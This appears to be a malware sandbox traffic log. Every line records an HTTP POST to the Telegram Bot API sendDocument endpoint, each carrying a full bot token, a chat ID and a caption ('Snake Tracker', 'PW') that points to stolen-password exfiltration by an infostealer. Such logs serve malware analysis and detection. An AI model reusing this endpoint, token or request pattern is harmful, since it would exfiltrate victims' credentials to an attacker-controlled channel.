              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20bb0ba85598Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2059540f56aaHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2003b93d294eHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20cec9e96ae0Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20718558b20cHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd201d8285f219Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20e3c6ae2bb6Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20859c831fbcHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd202f16a5978cHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20f8ada3c59eHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd209da301b406Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2044a7ee04b8Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21101d4364c8Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20b5944b821bHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd205b7d4f4ac3Host: api.telegram.orgContent-Length: 535Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd212ca5861b19Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20cec3117c14Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2070e745a6dfHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2149110694f3Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20e53751f75bHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd208793074bc2Host: api.telegram.orgContent-Length: 535Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2164183e6431Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20ff88b239deHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd209cd6857f2cHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd217f06734e57Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd211870eb7966Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20b3594cb916Host: api.telegram.orgContent-Length: 535Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd219ef909f384Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd213292786ec5Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20c87699746cHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21c3e3b174c0Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2150839db402Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20dd81284159Host: api.telegram.orgContent-Length: 535Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21e620954fe3Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2170f0ccb8bfHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20f3c83870c3Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd220d4b323153Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd218eab45cc14Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd210b4912642dHost: api.telegram.orgContent-Length: 535Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd223310119778Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21b2badf5d23Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21254f48c305Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd225771662831Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21d6aa07b8e0Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd213f3d4bedcbHost: api.telegram.orgContent-Length: 535Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2281f045fe39Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21fd08727360Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd215a5df1d419Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22b505293680Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd222ae7dea767Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2177fa1de5caHost: api.telegram.orgContent-Length: 535Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22e92e63468fHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd225621140a82Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21957fa780ddHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd231ab10327a5Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22799af3df8bHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21b1a0691632Host: api.telegram.orgContent-Length: 535Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2362215e27d7Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22aae7254cb3Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21d54c9e0a5cHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd23af6eeb12b8Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22de9ba98f31Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21f79a600637Host: api.telegram.orgContent-Length: 535Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd24077f7c4b2dHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd231c021e891bHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd221edce7d449Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd246a28398923Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2370c4ba52f1Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd224ec822fa72Host: api.telegram.orgContent-Length: 535Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd24d2b90dc0e1Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd23bc8169851cHost: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd227d39ecb039Host: api.telegram.orgContent-Length: 535
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2565e5b25501Host: api.telegram.orgContent-Length: 535
